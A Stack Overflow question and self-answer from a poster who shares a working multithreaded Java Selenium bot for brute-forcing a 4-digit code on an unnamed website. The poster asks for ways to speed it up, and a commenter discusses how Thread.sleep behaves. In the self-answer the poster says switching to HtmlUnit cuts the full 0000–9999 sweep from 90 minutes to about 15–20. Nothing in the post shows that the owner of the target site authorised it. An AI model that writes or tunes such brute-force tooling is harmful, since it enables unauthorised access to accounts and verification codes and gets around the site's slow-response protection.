0

everyone! I have just created a brute force bot which uses WebDriver and multithreading to brute force a 4-digit code. 4-digit means a range of 0000 - 9999 possible String values. In my case, after clicking the "submit" button, not less than 7 seconds passes before the client gets a response from the server. So, I have decided to use Thread.sleep(7200) to let the page with a response be fully loaded. Then, I found out that I couldn't afford to wait for 9999*7,5 seconds for the task to be accomplished, so I had to use multithreading. I have a Quad-Core AMD machine with 1 virtual core per 1 hardware one, which gives me the opportunity to run 8 threads simultaneously. Ok, I have separated the whole job of 9999 combinations between 8 threads equally, each had got a scope of work of 1249 combinations + remainder thread starting at the very end. Ok, now I'm getting my job done in 1,5 hours (because the right code appears to be in the middle of the scope of work). That is much better, BUT it could be even more better! You know, the Thread.sleep(7500) is a pure waste of time. My machine could be switching to other threads which are wait() because of limited amount of hardware cores. How to do this? Any ideas?

Below are two classes to represent my architecture approach:

public class BruteforceBot extends Thread {

// All the necessary implementation, blah-blah

public void run() {
        brutforce();
    }

    private void brutforce() {
        initDriver();
        int counter = start;
        while (counter <= finish) {
            try {
                webDriver.get(gatewayURL);                
                webDriver.findElement(By.name("code")).sendKeys(codes.get(counter));              
                webDriver.findElement(By.name("code")).submit();                
                Thread.sleep(7200);
                String textFound = "";                
                try {
                    do {
                        textFound = Jsoup.parse(webDriver.getPageSource()).text();
                        //we need to be sure that the page is fully loaded
                    } while (textFound.contains("XXXXXXXXXXXXX"));
                } catch (org.openqa.selenium.JavascriptException je) {
                    System.err.println("JavascriptException: TypeError: "
                            + "document.documentElement is null");
                    continue;
                }
                // Test if the page returns XXXXXXXXXXXXX below
                if (textFound.contains("XXXXXXXXXXXXXXXx") && !textFound.contains("YYYYYYY")) {
                    System.out.println("Not " + codes.get(counter));
                    counter++;
                    // Test if the page contains "YYYYYYY" string below
                } else if (textFound.contains("YYYYYYY")) {
                    System.out.println("Correct Code is " + codes.get(counter));
                    botLogger.writeTheLogToFile("We have found it: " + textFound
                            + " ... at the code of " + codes.get(counter));
                    break;
                    // Test if any other case of response below
                } else {
                    System.out.println("WTF?");
                    botLogger.writeTheLogToFile("Strange response for code "
                            + codes.get(counter));
                    continue;
                }
            } catch (InterruptedException intrrEx) {
                System.err.println("Interrupted exception: ");
                intrrEx.printStackTrace();
            }
        }
        destroyDriver();
    } // end of bruteforce() method

And

   public class ThreadMaster {

// All the necessary implementation, blah-blah

        public ThreadMaster(int amountOfThreadsArgument, 
                ArrayList<String> customCodes) {
        this();
        this.codes = customCodes;
        this.amountOfThreads = amountOfThreadsArgument;        
        this.lastCodeIndex = codes.size() - 1;
        this.remainderThread = codes.size() % amountOfThreads;
        this.scopeOfWorkForASingleThread 
                = codes.size()/amountOfThreads;
    }

    public static void runThreads() {
        do {
        bots = new BruteforceBot[amountOfThreads];
        System.out.println("Bots array is populated");
    } while (bots.length != amountOfThreads);
    for (int j = 0; j <= amountOfThreads - 1;) {
        int finish = start + scopeOfWorkForASingleThread;
        try {
            bots[j] = new BruteforceBot(start, finish, codes);
        } catch (Exception e) {
            System.err.println("Putting a bot into a theads array failed");
            continue;
        }
        bots[j].start();
        start = finish;
        j++;
    }
    try {
        for (int j = 0; j <= amountOfThreads - 1; j++) {
            bots[j].join();
        }
    } catch (InterruptedException ie) {
        System.err.println("InterruptedException has occured "
                + "while a Bot was joining a thread ...");
        ie.printStackTrace();
    }
    // if there are any codes that are still remain to be tested  - 
    // this last bot/thread will take care of them 
    if (remainderThread != 0) {
        try {
            int remainderStart = lastCodeIndex - remainderThread;
            int remainderFinish = lastCodeIndex;
            BruteforceBot remainderBot
                    = new BruteforceBot(remainderStart, remainderFinish, codes);
            remainderBot.start();
            remainderBot.join();
        } catch (InterruptedException ie) {
            System.err.println("The remainder Bot has failed to "
                    + "create or start or join a thread ...");
        }
    }

}

I need your advise on how to improve the architecture of this app to make it successfully run with say, 20 threads instead of 8. My problem is - when I simply remove Thread.sleep(7200) and at the same time order to run 20 Thread instances instead of 8, the thread constantly fails to get a response from the server because it doesn't wait for 7 seconds for it to come. Therefore, the performance becomes not just less, it == 0; Which approach would you choose in this case?

P.S.: I order the amount of threads from the main() method:

public static void main(String[] args)
        throws InterruptedException, org.openqa.selenium.SessionNotCreatedException {
    System.setProperty("webdriver.gecko.driver", "lib/geckodriver.exe");         
    ThreadMaster tm = new ThreadMaster(8, new CodesGenerator().getListOfCodesFourDigits());     
    tm.runThreads();
Václav
  • 430
  • 1
  • 7
  • 22
  • 1
    'Thread.sleep(7500) is a pure waste of time. My machine could be switching to other threads which are wait()' I don't understand that. If a thread elects to Sleep(), the OS blocks it and frees up the core it was running on. If a another thread is ready, it will be 'immediately' dispatched onto the now-free core. If you have a Sleep(7200) call in your thread code, then you could run 800 threads, no problem, and you would not notice any slowdown. – Martin James Jul 14 '17 at 11:03
  • @MartinJames, unfortunately, `sleep()` does not release the lock on its resorces. It was discussed [here](https://stackoverflow.com/questions/1036754/difference-between-wait-and-sleep). During Thread.sleep(), the physical core will not be released, but it will be performing the Thread.sleep(). Only wait() can help here, as far as I can see it. – Václav Jul 14 '17 at 11:46
  • @MartinJames, do you think it is because geckodriver.exe and chromedriver.exe are both separate Windows programs which have little to do with my Java app and occupy my threads? Probably, it is not a Java-multithreading question but a Windows-multiprogramming one... anyway, I my hope to get an advice is still alive :) – Václav Jul 14 '17 at 12:19
  • 1
    'During Thread.sleep(), the physical core will not be released, but it will be performing the Thread.sleep().' - that is completely incorrect. – Martin James Jul 14 '17 at 14:00
  • @MartinJames, you are totally right! "If a thread elects to Sleep(), the OS blocks it and frees up the core it was running on" - This is right! I was wrong - I have just performed an experiment with 800 threads printing A, B and C with Thread.sleep(20000) between each letter and yes - all the 800 of A letters were printed at once. So, why is my app lags so badly with more than 8 threads? Is it because a Selenium WebDriver instance is also a thread and even a separate process in the OS? – Václav Jul 14 '17 at 14:13

1 Answers1

0

Okay, so everyone can't wait until my question will get a response so I decided to answer it as soon as I can (now!). If you would like to increase a performance of a Selenium WebDriver-based brute force bot like this one, you need to reject using the Selenium WebDriver. Because the WebDriver is a separate process in the OS, it does not even need a JVM to run. So, every single instance of the Bot was not only a thread managed by my JVM, but a Windows process also! This was the reason why I could hardly use my PC when this app was running with more than 8 threads (each thread was invoking a Windows process geckodriver.exe or chromedriver.exe). Okay, so what you really need to do to increase performance of such a brute force bot is to use HtmlUnit instead of Selenium! HtmlUnit is a pure Java framework, its jar could be found at Maven Central, its dependency could be added to your pom.xml. This way, brute forcing a 4-digit code takes 15 - 20 minutes, taking into account that after each attempt the website responds not faster than 7 seconds after each attempt. To compare, with Selenium WebDriver it took 90 minutes to accomplish the task. And thanks again to @MartinJames, who has pointed that Thread.sleep() does let the hardware core to switch to other threads!

Václav
  • 430
  • 1
  • 7
  • 22